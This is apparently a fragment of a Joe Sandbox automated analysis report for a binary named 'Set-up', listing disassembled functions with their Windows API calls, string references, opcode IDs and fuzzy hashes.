                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E65C39
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorException@8LastObjectSingleThrowWait
                                                                                                                                  • String ID: WaitForSingleObject()
                                                                                                                                  • API String ID: 4286754232-2408256805
                                                                                                                                  • Opcode ID: 2d483625df4ff0df2b49a3f763544691bcec42e6984babc4505c21a72a1488fe
                                                                                                                                  • Instruction ID: 525609eb55e241c621b6011edf16763a3e5ae480fc61b528cb2846155b0d5276
                                                                                                                                  • Opcode Fuzzy Hash: 2d483625df4ff0df2b49a3f763544691bcec42e6984babc4505c21a72a1488fe
                                                                                                                                  • Instruction Fuzzy Hash: 7711E6313546059FC728DB38DC46BADB7E4AF55724F10066AF961972E0DB70BC50C792
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E699C0: new.LIBCMT ref: 00E69A39
                                                                                                                                  • CreateEventW.KERNEL32(00000000,?,?,00000000,460C02D8), ref: 00E6AE4F
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E6AE5C
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6AEA0
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateErrorEventExceptionException@8LastRaiseThrow
                                                                                                                                  • String ID: CreateEventW()
                                                                                                                                  • API String ID: 4167972103-4236875438
                                                                                                                                  • Opcode ID: 3ae799217e14511e7de896b1753159a5c1b2cbcfc71a6111e9dd56699dac0e25
                                                                                                                                  • Instruction ID: 56f48704a0ee25e8e4777ad2ae10990bfe5153a311083edfe29526579bbf4dee
                                                                                                                                  • Opcode Fuzzy Hash: 3ae799217e14511e7de896b1753159a5c1b2cbcfc71a6111e9dd56699dac0e25
                                                                                                                                  • Instruction Fuzzy Hash: A921D571940249AFCB18DF65D955BAEBBF8FF44710F00416AF925E7280DB74A904CB90
                                                                                                                                  APIs
                                                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 00E5E140
                                                                                                                                  • GetLastError.KERNEL32(00000001,?), ref: 00E5E199
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5E1BE
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressErrorExceptionException@8LastProcRaiseThrow
                                                                                                                                  • String ID: GetProcAddress(
                                                                                                                                  • API String ID: 577639657-3397178597
                                                                                                                                  • Opcode ID: fb26a3fce4a09d05616a174a239a9f59ab641af878651cc2f2a9f8e94c6dadca
                                                                                                                                  • Instruction ID: 853239252e4bc19bd30cf4f25d82b51dc58f119375a3fdbdcb844e0a2aaf11ac
                                                                                                                                  • Opcode Fuzzy Hash: fb26a3fce4a09d05616a174a239a9f59ab641af878651cc2f2a9f8e94c6dadca
                                                                                                                                  • Instruction Fuzzy Hash: 8C1106B2900248EBCB14DBA0EC45FCEBBFCEF14714F004569F905A3281EB756A04C790
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00F13300: EnterCriticalSection.KERNEL32(0131BE48,460C02D8,00000000), ref: 00F13338
                                                                                                                                    • Part of subcall function 00F13300: GetCurrentThreadId.KERNEL32 ref: 00F13349
                                                                                                                                    • Part of subcall function 00F13300: __CxxThrowException@8.LIBVCRUNTIME ref: 00F13373
                                                                                                                                    • Part of subcall function 00F13300: LeaveCriticalSection.KERNEL32(0131BE48), ref: 00F13384
                                                                                                                                  • QueryPerformanceFrequency.KERNEL32(00000000,00000000,00000000), ref: 00F12FDD
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00F13038
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00F13063
                                                                                                                                  Strings
                                                                                                                                  • QueryPerformanceFrequency(), xrefs: 00F13046
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalException@8SectionThrow$CurrentEnterErrorFrequencyLastLeavePerformanceQueryThread
                                                                                                                                  • String ID: QueryPerformanceFrequency()
                                                                                                                                  • API String ID: 2762641212-1441144594
                                                                                                                                  • Opcode ID: 069122601470d904a0a6e1eaae4e209beee191959384b85193da5b62db5cca08
                                                                                                                                  • Instruction ID: b9fe9fc2557ff01daafe57311db49fb039169087b09dc0d96f1950a1326bdf5c
                                                                                                                                  • Opcode Fuzzy Hash: 069122601470d904a0a6e1eaae4e209beee191959384b85193da5b62db5cca08
                                                                                                                                  • Instruction Fuzzy Hash: 7211E5715183059BC314EF24D80974ABBE8FB88710F100D1DF5B4D2280EF71D5288796
                                                                                                                                  APIs
                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000008,460C02D8,460C02D8,?), ref: 00E59E1F
                                                                                                                                  • GetLastError.KERNEL32(00000001,?,?,?,?,?,?,?,?,?,?,?,?,00000000,01166088,000000FF), ref: 00E59E2B
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E59E5A
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorExceptionException@8LastOpenProcessRaiseThrowToken
                                                                                                                                  • String ID: OpenProcessToken()
                                                                                                                                  • API String ID: 4287247744-2162204382
                                                                                                                                  • Opcode ID: b8ff9aceef9ee5ec0183b8e642727459f7de7c6d98ffc1a0a8a1449a026d1eee
                                                                                                                                  • Instruction ID: da36b8564c1d644c46e5af09be68d8a2ad680923c79748d25fe5f2dd17a86a2d
                                                                                                                                  • Opcode Fuzzy Hash: b8ff9aceef9ee5ec0183b8e642727459f7de7c6d98ffc1a0a8a1449a026d1eee
                                                                                                                                  • Instruction Fuzzy Hash: 01119E71A50219EBCB14EFA8CC42BDEBBF8FB04B10F104669F911B7280DB756908CB90
                                                                                                                                  APIs
                                                                                                                                  • SetSecurityDescriptorControl.ADVAPI32(?,00001000,00001000), ref: 00E5A895
                                                                                                                                  • GetLastError.KERNEL32(00000001,?,00001000,00001000), ref: 00E5A8A7
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5A8D2
                                                                                                                                  Strings
                                                                                                                                  • SetSecurityDescriptorControl(), xrefs: 00E5A8B5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ControlDescriptorErrorException@8LastSecurityThrow
                                                                                                                                  • String ID: SetSecurityDescriptorControl()
                                                                                                                                  • API String ID: 2753198977-4156452905
                                                                                                                                  • Opcode ID: c7518a8378422181c0a1bbbc7537ef7d42ed081218cad63dc06436f96b7598de
                                                                                                                                  • Instruction ID: 32d3a71d9c85ed79a7d07bdf95114a8d43f39be179830a041ad4f304275560fc
                                                                                                                                  • Opcode Fuzzy Hash: c7518a8378422181c0a1bbbc7537ef7d42ed081218cad63dc06436f96b7598de
                                                                                                                                  • Instruction Fuzzy Hash: EBF02B31250308ABD314BF64DC47F457BE8BB14B56F104528F9449A1C0EBB2A858C7AA
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E5A450: LocalFree.KERNEL32 ref: 00E5A45A
                                                                                                                                  • SetEntriesInAclW.ADVAPI32(?,?,00000000), ref: 00E5A48A
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5A4C2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EntriesException@8FreeLocalThrow
                                                                                                                                  • String ID: AddAccessAllowedAceEx()$SetEntriesInAcl()
                                                                                                                                  • API String ID: 864054697-3477462717
                                                                                                                                  • Opcode ID: de16eb603819d91dba0b7f2e382506a20b5571343fe88714a02c9374b0c54c53
                                                                                                                                  • Instruction ID: 4e2b1002075a05cab11d17b856842e7c4e700bd692a4b50849d2dd51728af63a
                                                                                                                                  • Opcode Fuzzy Hash: de16eb603819d91dba0b7f2e382506a20b5571343fe88714a02c9374b0c54c53
                                                                                                                                  • Instruction Fuzzy Hash: B9F0E5326603087AC630BA759C0BF8A3B9D5B11765F008A29FD24760C0EAB1A51883EA
                                                                                                                                  APIs
                                                                                                                                  • ResetEvent.KERNEL32 ref: 00E82A9A
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E82AAA
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E82AD5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorEventException@8LastResetThrow
                                                                                                                                  • String ID: ResetEvent()
                                                                                                                                  • API String ID: 3143289850-2767349721
                                                                                                                                  • Opcode ID: 67d1e250c12a4d5569edb5f79d955875356105a89a89030130fdeb76e3ae042c
                                                                                                                                  • Instruction ID: 9e46f1bd311b4a37536c4e23725d69d50de61d3b5ec723d91c3f58f5339daab4
                                                                                                                                  • Opcode Fuzzy Hash: 67d1e250c12a4d5569edb5f79d955875356105a89a89030130fdeb76e3ae042c
                                                                                                                                  • Instruction Fuzzy Hash: 4DE020316743056BC92CB6B5AD4BF0A369C6F00B16F400A6CFE19A10C4EF60A408C3B7
                                                                                                                                  APIs
                                                                                                                                  • SetEvent.KERNEL32(?), ref: 00E82A4A
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E82A5A
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E82A85
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorEventException@8LastThrow
                                                                                                                                  • String ID: SetEvent()
                                                                                                                                  • API String ID: 2711642896-2184393977
                                                                                                                                  • Opcode ID: 9013a7d46335df6111781064796d9c5dda4422f8113ec8ead2fadd43c8d52689
                                                                                                                                  • Instruction ID: 46fb8b53fde66675d86db0c9031d23a0fa9a086e6a92bf4dc15cb793bd9fa3df
                                                                                                                                  • Opcode Fuzzy Hash: 9013a7d46335df6111781064796d9c5dda4422f8113ec8ead2fadd43c8d52689
                                                                                                                                  • Instruction Fuzzy Hash: 80E020716643046BC52CB6B55D4BF0D369C5F00B16F400AACFD28A10C4EF60A448C3B7
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131B8F8,460C02D8,?,?), ref: 00E5F47F
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E5F5B3
                                                                                                                                    • Part of subcall function 00E5EFB0: EnterCriticalSection.KERNEL32(0131B8F8,460C02D8,?,?), ref: 00E5EFE9
                                                                                                                                    • Part of subcall function 00E5EFB0: LeaveCriticalSection.KERNEL32(0131B8F8,?,?), ref: 00E5F064
                                                                                                                                    • Part of subcall function 00E5EE70: GetConsoleScreenBufferInfo.KERNEL32(?,?,?,?,?,00E5F001,?,?), ref: 00E5EE9D
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131B8F8,?), ref: 00E5F4F5
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E5F59B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterLeave$BufferConsoleInfoScreen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3772441972-0
                                                                                                                                  • Opcode ID: 68f0cfd3a57ee5cd8280750d321a90ad39decfb04623d36d7bd05ffc98595ed7
                                                                                                                                  • Instruction ID: 79f08dc1a6be76636296cd796d82cd19fb1e40f02c8d2e3c25e54c2fcacef722
                                                                                                                                  • Opcode Fuzzy Hash: 68f0cfd3a57ee5cd8280750d321a90ad39decfb04623d36d7bd05ffc98595ed7
                                                                                                                                  • Instruction Fuzzy Hash: F441E030A04298DECB08CFA8D844BEDBBF4EF19719F101569E811B7385EB715E48CB61
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131B8F8,460C02D8,?,?), ref: 00E5F2DF
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E5F410
                                                                                                                                    • Part of subcall function 00E5EFB0: EnterCriticalSection.KERNEL32(0131B8F8,460C02D8,?,?), ref: 00E5EFE9
                                                                                                                                    • Part of subcall function 00E5EFB0: LeaveCriticalSection.KERNEL32(0131B8F8,?,?), ref: 00E5F064
                                                                                                                                    • Part of subcall function 00E5EE70: GetConsoleScreenBufferInfo.KERNEL32(?,?,?,?,?,00E5F001,?,?), ref: 00E5EE9D
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131B8F8,?), ref: 00E5F35B
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E5F3F8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterLeave$BufferConsoleInfoScreen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3772441972-0
                                                                                                                                  • Opcode ID: 5aa5967a7922371b14fd644b84c462f37347a41f5681c01f1ce7d368084213f8
                                                                                                                                  • Instruction ID: 3f32107a265d9d29370b5d7cd61c7e1a203c34a193dadd8b791a58b7ba11852c
                                                                                                                                  • Opcode Fuzzy Hash: 5aa5967a7922371b14fd644b84c462f37347a41f5681c01f1ce7d368084213f8
                                                                                                                                  • Instruction Fuzzy Hash: C641DE30A04288DEDB18DFA8C545BDDBBB8EF19718F4005A9EC21B7385DB715E08CB20
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131B8F8,460C02D8,00000000,?), ref: 00E5FF13
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E60273
                                                                                                                                    • Part of subcall function 00E5EE70: GetConsoleScreenBufferInfo.KERNEL32(?,?,?,?,?,00E5F001,?,?), ref: 00E5EE9D
                                                                                                                                    • Part of subcall function 00E5EFB0: EnterCriticalSection.KERNEL32(0131B8F8,460C02D8,?,?), ref: 00E5EFE9
                                                                                                                                    • Part of subcall function 00E5EFB0: LeaveCriticalSection.KERNEL32(0131B8F8,?,?), ref: 00E5F064
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterLeave$BufferConsoleInfoScreen
                                                                                                                                  • String ID: !af_ && i<length()$basic_ncstring<wchar_t>::operator []
                                                                                                                                  • API String ID: 3772441972-589021327
                                                                                                                                  • Opcode ID: d9defbe05507fe06d8c60868238d62da11f360e297e6fad6df83c64768e2a87d
                                                                                                                                  • Instruction ID: 7f2cd4acb75ffeaa5ccd6481ae84a697cf3dfd8018fc6a6aeff46002f441fc98
                                                                                                                                  • Opcode Fuzzy Hash: d9defbe05507fe06d8c60868238d62da11f360e297e6fad6df83c64768e2a87d
                                                                                                                                  • Instruction Fuzzy Hash: 8AA11630A45269DBCF25DFA4E858BAFB7F8AF05358F041168E411BB2D5DB70A904C790
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID: !af_$datavect<unsigned char>::begin$datavect<unsigned char>::empty
                                                                                                                                  • API String ID: 1452528299-3321375171
                                                                                                                                  • Opcode ID: a45b5f5a27817f31080a93015ecf9602a80742e3975a8ffa1c0944c546ecac89
                                                                                                                                  • Instruction ID: c98037a3016eaae7c73253ecbf4e2080e2c2c0dd5706f11e16b68a807fa44468
                                                                                                                                  • Opcode Fuzzy Hash: a45b5f5a27817f31080a93015ecf9602a80742e3975a8ffa1c0944c546ecac89
                                                                                                                                  • Instruction Fuzzy Hash: E6919171A00205DFDB14EFA4DC95FAEB7F4EF14308F105528E905BB292EB34A959CBA1
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID: !af_$datavect<unsigned char>::empty$datavect<unsigned char>::size
                                                                                                                                  • API String ID: 1452528299-2998150203
                                                                                                                                  • Opcode ID: d79f4513934213d4d08ceb5dfcc04d89ec3df6ab4e1acd6a435e47218096cfc2
                                                                                                                                  • Instruction ID: 636727693f44e5860c4ea8c42a6ecd8b1f96656338fe6e0a31517ad0e08aa2df
                                                                                                                                  • Opcode Fuzzy Hash: d79f4513934213d4d08ceb5dfcc04d89ec3df6ab4e1acd6a435e47218096cfc2
                                                                                                                                  • Instruction Fuzzy Hash: 81811770A00308DFDB14EF64DC55BAEBBF4EF11319F249959E805BB281E774A909CB91
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E5A720: LocalAlloc.KERNEL32(00000040,00000014), ref: 00E5A731
                                                                                                                                    • Part of subcall function 00E5A720: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00E5A740
                                                                                                                                  • LocalFree.KERNEL32(?,460C02D8), ref: 00E5AB3A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Local$AllocDescriptorFreeInitializeSecurity
                                                                                                                                  • String ID: !af_$datavect<struct _EXPLICIT_ACCESS_W>::begin$datavect<unsigned char>::size
                                                                                                                                  • API String ID: 4091588403-1336233802
                                                                                                                                  • Opcode ID: 8765276abe6f0b5abf387f9cb6aeebf18ceee6b489642cc216f772a012292c0a
                                                                                                                                  • Instruction ID: 7b9c6a27b5c32a4b26427d7ca1d1e1d0e9247d37420860dc3154bd383a8ad5ac
                                                                                                                                  • Opcode Fuzzy Hash: 8765276abe6f0b5abf387f9cb6aeebf18ceee6b489642cc216f772a012292c0a
                                                                                                                                  • Instruction Fuzzy Hash: 51719171900244DFDB25DFA8C945BAEBBF8BB04715F1846B9EC15B7281D7709E08CBA2
                                                                                                                                  APIs
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E6267F
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E626BA
                                                                                                                                  • GetConsoleScreenBufferInfo.KERNEL32(?,?,?,?,?), ref: 00E626F8
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B8F8,?), ref: 00E62771
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_task$BufferConsoleCriticalInfoLeaveScreenSection
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2158363688-0
                                                                                                                                  • Opcode ID: 43e0825da9aa2464f71d2fe999ce479d52ee2e1072462f1f239747657aa79af4
                                                                                                                                  • Instruction ID: 1ef109ac314b51b6741f24c93f4c15be1e500def4bcdf735ed167d21b98edbac
                                                                                                                                  • Opcode Fuzzy Hash: 43e0825da9aa2464f71d2fe999ce479d52ee2e1072462f1f239747657aa79af4
                                                                                                                                  • Instruction Fuzzy Hash: 3F51F430A44A098FDF28DB60E898BBDB7B5EF103A4F14652DD522FB1D4EB30A984C751
                                                                                                                                  APIs
                                                                                                                                  • SetLastError.KERNEL32(000000EA,?,0131B724,00000000,?,?,00E4769F,00E3A936,00000000,00000000,?), ref: 00E49E34
                                                                                                                                    • Part of subcall function 00E4A030: Concurrency::cancel_current_task.LIBCPMT ref: 00E4A3BA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_taskErrorLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 523316592-0
                                                                                                                                  • Opcode ID: fb67901062c4a72ae3ee8b88e8bd7c45a881f6f7368feb2c04526b8f9e81c87b
                                                                                                                                  • Instruction ID: a12f7cde01af9cf1d75427c7efc387b1020c218e4ccf4a70f030a03a6937ed53
                                                                                                                                  • Opcode Fuzzy Hash: fb67901062c4a72ae3ee8b88e8bd7c45a881f6f7368feb2c04526b8f9e81c87b
                                                                                                                                  • Instruction Fuzzy Hash: 7321F13234020467EF249EA5FC86BABB3D8EB89361F101165FE18FA1C1DA31A85197A1
                                                                                                                                  APIs
                                                                                                                                  • ___initconin.LIBCMT ref: 01122E0E
                                                                                                                                  • GetConsoleMode.KERNEL32(FFFFFFFE,?,012FF458,00000030,01122DB8,012FF438,0000000C), ref: 01122E25
                                                                                                                                  • SetConsoleMode.KERNEL32(FFFFFFFE,00000000), ref: 01122E2F
                                                                                                                                  • ReadConsoleInputA.KERNEL32(FFFFFFFE,?,00000001,?), ref: 01122E46
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Console$Mode$InputRead___initconin
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1944608451-0
                                                                                                                                  • Opcode ID: b3a6fae4a50d916f4d4c9954f9a9958f39123090e589eb401eac26ff308defd4
                                                                                                                                  • Instruction ID: 924c609c7bd260ab775de786f1199cfe0c24fe8d4267cd0be3d6a4e01ee73d80
                                                                                                                                  • Opcode Fuzzy Hash: b3a6fae4a50d916f4d4c9954f9a9958f39123090e589eb401eac26ff308defd4
                                                                                                                                  • Instruction Fuzzy Hash: 2321E471C00274EFDB399FA8D8946FD7BB9BB05310F44022AE590A72C0D7349945EB21
                                                                                                                                  APIs
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E842B1
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E842C9
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E842E1
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E842F9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throw
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2005118841-0
                                                                                                                                  • Opcode ID: ea2c044f6bfb2e4a03e30d1fb4634255bf87cf31f8443d5fb1a189aa3e88a16e
                                                                                                                                  • Instruction ID: 48926979c9b7d71678d1f4fd2646eeed8256b9b07b1a36232f5d3e15800d3ac3
                                                                                                                                  • Opcode Fuzzy Hash: ea2c044f6bfb2e4a03e30d1fb4634255bf87cf31f8443d5fb1a189aa3e88a16e
                                                                                                                                  • Instruction Fuzzy Hash: 3711277150834A7AC605F6B4DC19D99BBE8EF51708F00886CF60C631E1EB71EA01C39A
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131BE48,460C02D8), ref: 00E66077
